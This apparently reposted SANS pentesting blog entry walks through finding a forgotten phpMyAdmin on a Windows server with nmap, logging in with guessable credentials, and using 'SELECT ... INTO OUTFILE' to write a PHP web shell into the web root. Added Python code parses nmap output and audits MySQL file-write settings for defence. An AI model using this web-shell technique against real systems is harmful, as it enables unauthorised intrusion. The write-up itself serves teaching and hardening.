Putting the MY in phpMyAdmin | SANS Pentesting Blog

Because I've used something similar to this in the past and it still works with phpMyAdmin...

WARNING: Technical content.

In this article, Tim Medin walks us through a few steps of a recent pen test he did, wherein he exploits phpMyAdmin. The best part of this write up is that he shows the mindset of a pen tester as he methodically attacks the target system step by step. In the process, he provides some good insight into exploiting PHP flaws via a MySQL instance running on a Windows target as well.

Discovery

$ nmap -sT -T3 -PS80,443,8000,8443,8800 -p 80,443,8000,8443,8080 -oA http-enum-results --script=http-enum -iL targets.txt

This nmap command does a full connect scan (-sT) at the "normal" speed (default is -T3). Web servers commonly run on port 80, 443, 8000, 8443, and 8080 and those are the ports we will use for host discovery (-PS) and examination (-p). I much prefer the -PS option over the -PN option (skip host discovery), as it gives me better insight as to the hosts that are up, instead of cluttering the output with hosts that don't exist and marking them with "Host is up". I also pass the command a file holding a list of my target servers using the -iL option.

Results

Nmap scan report for 172.16.105.194
Host is up (0.00083s latency).
PORT STATE SERVICE
80/tcp closed http
443/tcp closed https
8000/tcp closed http-alt
8080/tcp open http-proxy
| http-enum:
| /phpmyadmin/: phpMyAdmin
| /phpMyAdmin/: phpMyAdmin
|_ /PHPMyAdmin/: phpMyAdmin
8443/tcp closed https-alt
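When a scan like this covers a whole target list, the http-enum results are worth parsing in bulk so that forgotten, bundled admin interfaces turn up in an inventory rather than by luck. The parser below is an added example, not code from the original post: it reads nmap's normal (-oN) output, records the open ports per host and the http-enum paths found under each, and flags paths that look like phpMyAdmin. The sample output embedded in it is constructed to mirror the report above, and the class and function names, as well as the ADMIN_MARKERS list, are assumptions of this example.

```python
import re
from dataclasses import dataclass, field

# Constructed sample in nmap's normal (-oN) format, mirroring the report in
# the post. Not a real capture.
SAMPLE_OUTPUT = """\
Nmap scan report for 172.16.105.194
Host is up (0.00083s latency).
PORT     STATE  SERVICE
80/tcp   closed http
443/tcp  closed https
8000/tcp closed http-alt
8080/tcp open   http-proxy
| http-enum:
|   /phpmyadmin/: phpMyAdmin
|   /phpMyAdmin/: phpMyAdmin
|_  /PHPMyAdmin/: phpMyAdmin
8443/tcp closed https-alt
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")
# Script result lines look like "|   /path/: label" or "|_  /path/: label";
# the "| http-enum:" header has no leading slash and is skipped.
ENUM_RE = re.compile(r"^\|[_ ]?\s*(/\S*):\s*(.*)$")

# Substrings that mark a path or label as an admin interface (assumption).
ADMIN_MARKERS = ("phpmyadmin",)


@dataclass
class HostReport:
    address: str
    open_ports: dict = field(default_factory=dict)  # port -> service name
    web_paths: dict = field(default_factory=dict)   # port -> [(path, label)]


def parse_nmap_normal(text):
    """Parse -oN output into one HostReport per 'Nmap scan report' block."""
    reports = []
    current = None
    current_port = None  # open port whose script output we are reading
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = HostReport(m.group(1))
            reports.append(current)
            current_port = None
            continue
        if current is None:
            continue
        m = PORT_RE.match(line)
        if m:
            port, state, service = int(m.group(1)), m.group(3), m.group(4)
            if state == "open":
                current.open_ports[port] = service
                current_port = port
            else:
                current_port = None
            continue
        m = ENUM_RE.match(line)
        if m and current_port is not None:
            current.web_paths.setdefault(current_port, []).append(
                (m.group(1), m.group(2)))
    return reports


def find_admin_interfaces(reports):
    """Return (address, port, path) for every enumerated path whose path or
    label contains one of ADMIN_MARKERS."""
    hits = []
    for r in reports:
        for port, paths in r.web_paths.items():
            for path, label in paths:
                haystack = (path + " " + label).lower()
                if any(marker in haystack for marker in ADMIN_MARKERS):
                    hits.append((r.address, port, path))
    return hits


if __name__ == "__main__":
    for address, port, path in find_admin_interfaces(parse_nmap_normal(SAMPLE_OUTPUT)):
        print("%s:%d %s" % (address, port, path))
```

Feed it the -oN file nmap writes alongside the -oA output from the command above; every host that answers with a phpMyAdmin path becomes one line an administrator can reconcile against what they believe is installed.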

It turns out the server hosts an admin interface for a particular network-monitoring product. The installer for this product installed phpMyAdmin with easy-to-guess credentials (root/root or something, I forget). None of the admins knew that phpMyAdmin was even on the box. It was yet another example of the pen tester's best friend: the old "accidentally installed because it was bundled with something else" routine. Time to play with this newfound toy! It shows them a secret way that nobody else could find. And they say sneak! Sneak? Very nice friend, oh yes My Precious, very nice...

We can use phpMyAdmin to execute arbitrary SQL. I quickly try sqlmap, but it seems that sqlmap wants injection, and not full control of all the SQL, so it gets confused. I could tweak the code, but that is no fun. I like sqlmap, but it's like a little brother. It is great to send off to do something you don't want to do, but when you really need something intense and focused done, you are going to have to do it yourself.

The obvious next step is to upload a web shell using SQL. Remember, when you paste the shell into SQL you need to escape the single quotes (') with a backslash (\') or the SQL won't be valid. I injected some PHP shell code using the following syntax:

select '[escaped php shell code]' INTO OUTFILE 'c:\\inetpub\\wwwroot\\shell.php';
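What made this step possible was a pair of server-side conditions: the phpMyAdmin credentials belonged to an account holding MySQL's FILE privilege, and the server was free to write files into the web root. The helpers below are an added example, not code from the post, from phpMyAdmin or from MySQL, for auditing both conditions after an engagement. One judges the value of the real MySQL system variable secure_file_priv (NULL disables INTO OUTFILE and LOAD_FILE(), an empty string leaves them unrestricted, a directory confines them to that directory) against the web root; the other lists accounts whose File_priv column in mysql.user is set. The user rows and paths inside are constructed, and the function names are my own.

```python
import re
from pathlib import PurePosixPath, PureWindowsPath

# Constructed rows standing in for the result of
#   SELECT user, host, File_priv FROM mysql.user;
# on a server like the one in the post. Not real data.
SAMPLE_USER_ROWS = [
    ("root", "localhost", "Y"),
    ("root", "%", "Y"),
    ("monitor_app", "localhost", "N"),
]


def _as_path(p):
    # Use Windows semantics (case-insensitive, backslashes) when the string
    # looks like a Windows path, POSIX semantics otherwise.
    if re.match(r"^[A-Za-z]:", p) or "\\" in p:
        return PureWindowsPath(p)
    return PurePosixPath(p)


def classify_secure_file_priv(value, web_root):
    """Judge the value reported by SHOW VARIABLES LIKE 'secure_file_priv'
    against the web root. Pass None for SQL NULL. Returns (verdict, reason)."""
    if value is None:
        return ("ok", "secure_file_priv is NULL: INTO OUTFILE and LOAD_FILE() are disabled")
    if value == "":
        return ("finding",
                "secure_file_priv is empty: mysqld may write files anywhere it "
                "has permission, including the web root %s" % web_root)
    priv_dir = _as_path(value)
    root = _as_path(web_root)
    # A restriction directory that is the web root, or an ancestor of it,
    # still lets SELECT ... INTO OUTFILE land where the web server serves it.
    if root == priv_dir or priv_dir in root.parents:
        return ("finding", "secure_file_priv %r contains the web root %s" % (value, web_root))
    return ("ok", "secure_file_priv restricts file output to %r, outside the web root" % value)


def accounts_with_file_priv(rows):
    """From (user, host, File_priv) rows, list the accounts holding the
    global FILE privilege, which INTO OUTFILE requires."""
    return [(user, host) for user, host, file_priv in rows if file_priv.upper() == "Y"]


if __name__ == "__main__":
    web_root = "c:\\inetpub\\wwwroot"
    for value in (None, "", "C:\\inetpub\\", "C:\\ProgramData\\MySQL\\Uploads\\"):
        print(repr(value), "->", classify_secure_file_priv(value, web_root))
    print("accounts with FILE:", accounts_with_file_priv(SAMPLE_USER_ROWS))
```

The two findings to act on are a FILE-privileged account reachable through a web-exposed phpMyAdmin and a secure_file_priv that is empty or covers the web root; fixing either one removes the path the post walks through, and the variable can only be set in the server configuration, not at runtime.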

Continue reading the post, it gets very funny.